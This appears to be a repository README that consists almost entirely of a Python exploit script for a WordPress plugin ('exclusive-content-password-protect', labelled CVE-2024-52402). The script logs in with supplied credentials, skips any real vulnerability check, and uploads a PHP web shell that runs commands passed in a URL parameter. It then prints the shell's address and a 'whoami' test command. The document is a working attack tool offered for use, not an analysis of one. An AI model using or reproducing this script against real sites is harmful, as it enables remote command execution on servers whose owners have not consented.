README.md
Rendering markdown...
import requests
import argparse
import re
# Nxploit, Khaled ALenazi
# Disable SSL warnings
requests.packages.urllib3.disable_warnings()
class WordPressExploiter:
def __init__(self, url, username, password):
self.url = url
self.username = username
self.password = password
self.user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
self.session = self._initialize_session()
def _initialize_session(self):
session = requests.Session()
session.verify = False # Ignore SSL verification
return session
def get_plugin_version(self):
readme_url = f"{self.url}/wp-content/plugins/exclusive-content-password-protect/readme.txt"
response = self.session.get(readme_url, headers={"User-Agent": self.user_agent}, verify=False)
if response.status_code == 200:
match = re.search(r"Stable tag:\s*(\d+\.\d+\.\d+)", response.text)
if match:
return match.group(1)
return None
def is_potentially_vulnerable(self, version):
# This method is kept for any future version checks, but currently, it always returns True
return True
def login_to_wordpress(self):
login_url = self.url + "/wp-login.php"
login_data = {
"log": self.username,
"pwd": self.password,
"rememberme": "forever",
"wp-submit": "Log In"
}
response = self.session.post(login_url, data=login_data, headers={"User-Agent": self.user_agent}, verify=False)
return any("wordpress_logged_in" in cookie.name for cookie in self.session.cookies)
def upload_web_shell(self):
exploit_url = f"{self.url}/wp-admin/admin.php?page=1.1.0%2Fcontent-password-protect.php"
shell_filename = "nxploit.php"
shell_code = """<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>"""
files = {
"userfile": (shell_filename, shell_code, "application/x-php")
}
headers = {
"User-Agent": self.user_agent,
"Referer": exploit_url
}
response = self.session.post(exploit_url, files=files, headers=headers, verify=False)
if response.status_code == 200:
return f"{self.url}/wp-content/uploads/{shell_filename}"
return None
def main():
parser = argparse.ArgumentParser(description="Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi ")
parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL")
parser.add_argument("-un", "--username", required=True, help="WordPress username")
parser.add_argument("-p", "--password", required=True, help="WordPress password")
args = parser.parse_args()
exploiter = WordPressExploiter(args.url, args.username, args.password)
version = exploiter.get_plugin_version()
if version:
print(f"[+] Plugin version detected: {version}")
if exploiter.is_potentially_vulnerable(version):
print("[!] Attempting exploitation...")
else:
print("[X] Site is not vulnerable. Exiting.")
return
else:
print("[X] Could not determine the plugin version. Proceeding with exploitation attempt...")
if exploiter.login_to_wordpress():
print("[+] Logged in successfully.")
else:
print("[X] Failed to log in.")
return
shell_url = exploiter.upload_web_shell()
if shell_url:
print(f"[!] Exploit completed! Web Shell uploaded: {shell_url}")
print(f"[*] Test with: {shell_url}?cmd=whoami")
else:
print("[X] Exploit failed. Check manually.")
if __name__ == "__main__":
main()